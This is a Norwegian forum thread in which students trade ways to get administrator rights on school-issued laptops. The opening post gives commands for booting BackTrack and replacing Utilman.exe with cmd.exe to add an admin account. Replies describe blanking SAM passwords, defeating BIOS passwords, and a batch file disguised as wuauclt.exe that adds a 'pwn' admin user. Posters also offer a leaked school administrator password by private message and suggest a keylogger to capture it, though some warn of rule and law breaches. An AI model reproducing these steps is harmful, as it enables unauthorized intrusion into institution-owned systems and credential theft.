Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  32 6247
[COLOR="Red"]EDIT: KLARTE Å TRYKKE OPPRETT TRÅD, I STEDET FOR "FORHÅNDSVIS". Be Patiente, more will come[/COLOR]

Hei!

Er lei av alle de trådene som popper opp hvertfall 1-2 ganger daglig nå etter skolestart, så tok initiativet til å Forklare litt, å linke til forskjellige tråder og sider hvor du LETT kan finne ut hvordan du gjør dette, og utdype Backtrack 3 måten.

Du kan gjøre dette med forskjellige verktøy...
  • Backtrack 3/4 (funker mest sannsynlig ikke etter skoleåret 08/09)
  • My Pc Login
  • Ophcrack


Vist du ikke har lyst å teste noen av disse programmene gå til denne siden: http://www.threatcode.com/admin_rights.htm

1. Backtrack 3

Du kan laste det ned her: http://www.remote-exploit.org/backtrack_download.html
Svi ISO fila på ei CD, eller last ned USB versjonen å legg den inn på en minnepenn.

Husk å gå i BIOS å velg at du skal boote fra CD.
Sett i Backtrack 3 Live CD'n du nettop brente, å restart PC'n å boot fra cd'n, å gjør som følgene...

Når du har boota opp å er klar så må du skrive et passord for å kunne bruke det...

Username: root
Password: toor


http://www.paulspoerry.com/wp-content/uploads/remote-exploit.org/images/screens/terminal_small.jpg





Begynn med å skrive følgene inn i Shell Promt

cd / mnt (endre katalog til montert stasjoner)
ls (få listen over montert stasjoner)
cd sda1 (sda1 er den viktigste harddisk)
cd Windows / (endring i Windows-katalogen)
cd System32 / (endre til systeme katalogen)
mv Utilman.exe Utilman.old (backup original fil)
cp cmd.exe Utilman.exe (kopi cmd.exe som utilman.exe)
reboot

http://www.paulspoerry.com/wp-content/uploads/remote-exploit.org/images/bt-vista.PNG

Når du har reboota pc'n, så trykker du Windows tasten + U for å åpne Utility Manager (CMD.exe)
Skriv så inn:

Kode

net user *bruker*Admin *Passorde ditt* /add
 net localgroup administratorer *bruker*Admin /add
Reboot å du har admin rettigheter.

Kan hende du får "Systemfeil 5", ettersom de fleste IKT avdelinger på skoler rundt om i fylkene har stengt denne "bakdøra"...


2. My Pc Login

Last
Sist endret av Ondskap; 2. september 2009 kl. 19:57.
Hei.
Jeg har prøvd dette, men det eneste som skjedde når jeg trykka Win + U, er at musepekeren ble til et timeglass i en liten periode.
Har du prøvd dette i det siste?

EDIT: Og forresten, det er derfor jeg istedet åpner SAM-fila, plasserer en ny bruker der, åpner lokalgruppe fila, og plasserer brukeren der som admin.

EDIT again: Jeg har altså ikke PRØVD å gjøre det jeg nevnte, jeg forsker på det enda
Sist endret av VLK; 2. september 2009 kl. 20:02.
Jess, har prøvd dette, å det funker utmerket på min Skolepc, men mange som får systemfeil 5...

[COLOR="Red"]EDIT[/COLOR]

AV en eller annen grunn finner jeg ikke softwaren My Pc Login lengere o0
Kan hende jeg har plata liggende, å blir å laste det opp etterhvert...
Kan skrive en liten shitty tut her oppe... Men blir bedre når jeg får screenshots, å er bedre å forklare.

2. My Pc Login...

Finner ikke denne lengere, men vist du søker lenge nok på Google så finner du det vel etterhvert....
Iværtfall...

Når/Visst du finner dette, lag en bootable cd, å boot den opp.
Velg Group/Bruker, å trykk neste el. det er ganske åpenbart, du kan ikke gjøre feil her.

Når du kommer til neste side, å har valgt bruker, så får du noen nye valg.
Trykk <Disable Password> og deretter <Never Expire> el.

Restart PC'n å du har fri tilgang til Admin kontoen.
Når du trenger det igjenn, så kan du gjøre det samme, bare at du fjerner Disable password, så har du ikke tilgang lengere.

Høvelig vist du må levere den inn på service, åsså har du admin rettigheter av ymse grunner.
Sist endret av Ondskap; 2. september 2009 kl. 20:15. Grunn: Automatisk sammenslåing med etterfølgende innlegg.
Jeg har et problem når jeg skal kjøre backtrack 3 fra minnepenn.
Jeg lastet ned den versjonen som var for minnepenn og så kopierte jeg de to mappene som heter boot og BT3 over på minnepennen.
Etterpå startet jeg opp pcen igjen med minnepennen i og valgte start opp fra usb i BIOS.
Men ingenting skjer...
Hva kan jeg ha gjort galt da?

Har lest den andre tråden som handler om backtrack og spurt om hjelp der men har ikke fått noe svar.
Sitat av AlbertxD Vis innlegg
Jeg har et problem når jeg skal kjøre backtrack 3 fra minnepenn.
Jeg lastet ned den versjonen som var for minnepenn og så kopierte jeg de to mappene som heter boot og BT3 over på minnepennen.
Etterpå startet jeg opp pcen igjen med minnepennen i og valgte start opp fra usb i BIOS.
Men ingenting skjer...
Hva kan jeg ha gjort galt da?

Har lest den andre tråden som handler om backtrack og spurt om hjelp der men har ikke fått noe svar.
Vis hele sitatet...
Det skal vel være mer enn bare to mapper?
Du skal kopiere over ALT... Å husk at minnepenna må være helt tom, du må formatere den før du installerer BT3 på den.
Kanskje en idè å få med seg at dette er et soleklart kontraktsbrudd og du kan fort få pcen inndratt.
Sitat av abben Vis innlegg
Kanskje en idè å få med seg at dette er et soleklart kontraktsbrudd og du kan fort få pcen inndratt.
Vis hele sitatet...
Kan godt hende.
Men de fleste IKT folka bryr seg rævva hva vi gjør med pc'n.
Men var en fyr som lasta ned Cain og koste seg, han fikk inndratt pcn i 3 mnd.
Ja, de som har vært så uheldig å havnet på en skole som har satt BIOS pw, så funker ikke noen av disse...
Vi hadde bios pw. reiv ut batteriet til hovedkortet og ventet noen minutter og det var fikset. Men har sett at for noen så funker ikke dette
Sitat av mo3 Vis innlegg
Vi hadde bios pw. reiv ut batteriet til hovedkortet og ventet noen minutter og det var fikset. Men har sett at for noen så funker ikke dette
Vis hele sitatet...
Ja, det kan være en mulighet.
Funket faktisk på den forrige maskinen min da jeg hadde glemt BIOS pw'n...

Men har ikke testet det på skole pc'n (HP 6530b)
finnes lettere måter. gå opp til ikt folka, si at du trenger admin rettigheter pga, noen spesielle programmer dere trenger for å få jobba på skolen. hvem kan nekte en person å få jobba med skole arbeid?
Sitat av skeptfisk Vis innlegg
finnes lettere måter. gå opp til ikt folka, si at du trenger admin rettigheter pga, noen spesielle programmer dere trenger for å få jobba på skolen. hvem kan nekte en person å få jobba med skole arbeid?
Vis hele sitatet...
Alle programma du trenger for å jobbe med på skolen blir installert før du får pc'n...

Media: Photoshop osv..
TIP: CNC siomulator osv...

Og de installerer ikke noe annet bare fordi du sir du trenger det.
Sitat av Ondskap Vis innlegg
Alle programma du trenger for å jobbe med på skolen blir installert før du får pc'n...

Media: Photoshop osv..
TIP: CNC siomulator osv...

Og de installerer ikke noe annet bare fordi du sir du trenger det.
Vis hele sitatet...
i mitt tilfellet var det nettopp det som ikke skjedde. går automasjon, har en del programmer som IKT folka rett å slett ikke har tid til å installere for oss. så vi gikk opp å spurte om de kunne fikse admin rettigheter slik at vi kan gjøre det selv. og det var det. nå sitter jeg på en skole pc, med admin rettigheter når jeg logger inn.

hvis du er en tenkende sjel skal det ikke så mye til for å komme med en unnskyldning som gir IKT folka forståelse for at nettopp du trenger admin rettigheter.

man kommer lenger av å forstå mennesker, enn datamaskiner!
Joda ser den...

Men hvilket program TRENGER du virkelig så sårt for å få gjort skole arbeidet ditt?
De skal være installert før du får pcn, en slik unnskyldning funker ikke på min skole iværtfall...
Sitat av Ondskap Vis innlegg
Joda ser den...

Men hvilket program TRENGER du virkelig så sårt for å få gjort skole arbeidet ditt?
De skal være installert før du får pcn, en slik unnskyldning funker ikke på min skole iværtfall...
Vis hele sitatet...
nei nå sier ikke jeg at akkuratt det ville ha fungert på din skole, men jeg kan garantere deg, at det er noe som ville ha fungert på din skole. det handler om å stille de riktige spørsmålene.
Så en fyr i klassen som hadde gjort det mye lettere enn dette, jeg tror han bare avsluttet terminal server programmet for å bruke det som er på windows xp istedet, hvordan gjør man det?
▼ ... over en måned senere ... ▼
Sitat av mo3 Vis innlegg
Vi hadde bios pw. reiv ut batteriet til hovedkortet og ventet noen minutter og det var fikset. Men har sett at for noen så funker ikke dette
Vis hele sitatet...
Funker ikke på våre, en slags backup av biospw.
Med brostein i hånden
Johnny B's Avatar
altså, blanke ut admin passord er ikke så alt for vansklig. prøve å knekke det er det som ofte er problemet. dette er vanskelig ettersom at de ofte har skrudd av lagringen av lm hash, som gjør at du sitter igjen med NT hashen, noe som er veldig vansklig og knekke. ( har selv prøvd med diverse nt / vista tables ).

derfor sitter du igjen med få muligheter. det vi gjorde var at vi bootet opp i knoppix ( hvilken som helst linux distro skal kunne gjøre jobben vil jeg tro ) så tok vi backup av SAM og SYSTEM filene, blanket ut admin passordet, og deretter logget vi inn på admin brukeren. Men der møter vi på enda et problem. Der hvor jeg bor logger vi inn på et annet domene enn selve dataen, så det funker ikke å bare slå av UAC, og disable diverse morsomheter via regedit. Da står du fortsatt igjen med samme resultat ( du får ikke innstallert det du vil ). derfor innstallere vi abre det vi ville ved å trykke "kjør som admin" fra vår egen bruker. for å så putte tilbake de gamle sam og system filene via knoppix når vi var ferdige.

hvorfor ikke bare bruke gjeste brukeren, og gjøre den f.eks admin vil du da kanskje spørre?
jo, fordi av en eller annen merkelig grunn får jeg svaret: påloggings metoden du bruker er ulovlig. selv om jeg har riktig passord.

det er også mulig og bruke den vanlige admin kontoen ettersom at den faktisk ikek var aktivert, og de hadde laget en alternativ admin konto som de bruker når de logger inn. men dette er en risky metode, så om du liker å "leve på kanten" så slå deg løs.

sorry for eventuelle skrivefeil, og jeg vil ikke ta noe ansvar for deres handliger om dere velger å følge denne kreative løsningen. Så ikke kom og klag over at metoden min ikke fungerte om du blir tatt for et eller annet.

edit: det med bios pw vet jeg ikke hvordan du kommer deg rundt ( finnes helt sikkert noe på google ), men vi trengte bare trykke f9 eller noe sånt når vi startet opp, slik at vi kom rett opp i menyen hvor vi kunne velge hva vi skulle boote opp i fra. noe som var litt rart ettersom at de hadde satt passord på selve boot menyen... det med f9 er nok forskjellig på de fleste modeller så ikke forvent at det skal fungere.

enda en edit: litt ot da men. får innimellom: referanse returnert fra serveren. når jeg prøver å kjøre noen exe filer. noen som vet hva problemet kanvære?
Sist endret av Johnny B; 5. november 2009 kl. 22:27.
▼ ... noen uker senere ... ▼
Glmete passordet på pcen min (VISTA) Backtrack fungerte strålende! KP
Fet guide, takker!
Hei!
I Verdal / Nord-trøndelag (Med systemet som er NÅ for øyeblikiket, de har oppgradert litt nå) gjorde jeg dette:

* Først: Det tar tid å bruke backtrack osv osv, og på de fleste av pcene her er det bios passord.
* Jeg koblet disken til en annen PC jeg hadde.
* Når vi starter pcen og logger på, blir det kjørt et oppstartsskript som sletter alle LOKALE brukere og deaktiverer adminkonto, og masse dritt. Til slutt kjører den wuauclt /updatenow , /reportnow og en ting til. Vet ikke hva akkurat dette programmet gjør, men dette blir kjørt på slutten av oppstartsskriptet. Oppstartsskriptet blir uheldigvis (for NTFK) kjørt som systembruker..

Til dette laga jeg en batch fil som adda en bruker som heter "pwn", med passord "pwn" og la den i gruppen Administratorer, gjorde gjerne det på min egen konto også:

Kode

@echo off
net user /ADD pwn pwn
net localgroup Administratorer /ADD pwn
net localgroup Administratorer /ADD *mitt-brukernavn*
Og lasta ned "batch to exe converter". Laga den som wuauclt.exe, erstattet fila på disken (Jeg kobler disken til skolepcen til en annen, så jeg får lekt med filene altså!), slik at hver gang det ble kjørt, laga den pwn, la den og min konto i administratorer.

Dette har fungert fint..
Forresten, til alle i NTFK: Det har vært lekkasje på passordet til brukeren "Administrator" for ca 1 mnd siden, og NTFK har altså laget oppstartsskriptet på grunn av dette. Fortsatt har ikke noen av PC-ene i NTFK blitt oppdatert slik at passordet er blitt endret.

Passordet kan oppgis på forespørsel via PM

Tror forresten "guiden" over her vil fungere på andre skoler osv, om de kjører slike upstartscripts eller lignede.
Sist endret av Verdaling; 20. november 2009 kl. 09:20.
Har dere ikke administrator rettigheter på pcenen, dere har kjøpt via skule?

eller er det skolen sine pc`er det er snakk om?
Det er selvfølgelig snakk om pc'n man får utlevert fra skolen, som man da nedbetaler over 3 år på skolen.
Sitat av Ondskap Vis innlegg
Kan godt hende.
Men de fleste IKT folka bryr seg rævva hva vi gjør med pc'n.
Men var en fyr som lasta ned Cain og koste seg, han fikk inndratt pcn i 3 mnd.
Vis hele sitatet...
haha, på min skole i fjor var det 3 stk som ble annmeldt for å ha brukt Cain på skolen, og det tokk vel en måned eller to før de fikk dataen tilbake
Ja, eg har jo sånn på nedbetaling og har full tilgang på datan min!??
hva er det du vil fram til?

-Selvfølgelig har jeg jo ikke skrevet denne guide for at folk skal få admin rettigheter på pc'ne som står på skolen.
Hva er så vitsen med det?
nei, bare lurte om det var datane som vi kjøper til skolen var sperra jeg.
Siden min ikke er....
Nei, det er ikke _alle_ skole pc'r som har admin sperre, eller at du må ha admin rettigheter for å installere diverse ting å tang.
Men de _fleste_ er
▼ ... over et år senere ... ▼
Sitat av Verdaling Vis innlegg
Hei!
I Verdal / Nord-trøndelag (Med systemet som er NÅ for øyeblikiket, de har oppgradert litt nå) gjorde jeg dette:

* Først: Det tar tid å bruke backtrack osv osv, og på de fleste av pcene her er det bios passord.
* Jeg koblet disken til en annen PC jeg hadde.
* Når vi starter pcen og logger på, blir det kjørt et oppstartsskript som sletter alle LOKALE brukere og deaktiverer adminkonto, og masse dritt. Til slutt kjører den wuauclt /updatenow , /reportnow og en ting til. Vet ikke hva akkurat dette programmet gjør, men dette blir kjørt på slutten av oppstartsskriptet. Oppstartsskriptet blir uheldigvis (for NTFK) kjørt som systembruker..

Til dette laga jeg en batch fil som adda en bruker som heter "pwn", med passord "pwn" og la den i gruppen Administratorer, gjorde gjerne det på min egen konto også:

Kode

@echo off
net user /ADD pwn pwn
net localgroup Administratorer /ADD pwn
net localgroup Administratorer /ADD *mitt-brukernavn*
Og lasta ned "batch to exe converter". Laga den som wuauclt.exe, erstattet fila på disken (Jeg kobler disken til skolepcen til en annen, så jeg får lekt med filene altså!), slik at hver gang det ble kjørt, laga den pwn, la den og min konto i administratorer.

Dette har fungert fint..
Forresten, til alle i NTFK: Det har vært lekkasje på passordet til brukeren "Administrator" for ca 1 mnd siden, og NTFK har altså laget oppstartsskriptet på grunn av dette. Fortsatt har ikke noen av PC-ene i NTFK blitt oppdatert slik at passordet er blitt endret.

Passordet kan oppgis på forespørsel via PM

Tror forresten "guiden" over her vil fungere på andre skoler osv, om de kjører slike upstartscripts eller lignede.
Vis hele sitatet...
Muligt å få passordet atm?
IKT-Tekniker
Sitat av tyDzeY Vis innlegg
Muligt å få passordet atm?
Vis hele sitatet...
Hei. PCRep Levanger her.
Passordet er nå skiftet og det er lagt inn Windows 7 med BitLocker på alle PC-ene. Det er derfor håpløst å prøve seg på de PC-ene.
hva med en keylogger?
Om man går bort og sier at man skal re installere et program, så trenger man adminpassordet. Bare be dem om å skrive det inn for å avinstallere et program. Noen som har fått en keylogger til å fungere på skolenpcen deres?
Begrenset bruker
uaexed's Avatar
Sitat av sgt_coke Vis innlegg
hva med en keylogger?
Om man går bort og sier at man skal re installere et program, så trenger man adminpassordet. Bare be dem om å skrive det inn for å avinstallere et program. Noen som har fått en keylogger til å fungere på skolenpcen deres?
Vis hele sitatet...
Da har du brutt ett par reglementer/lover.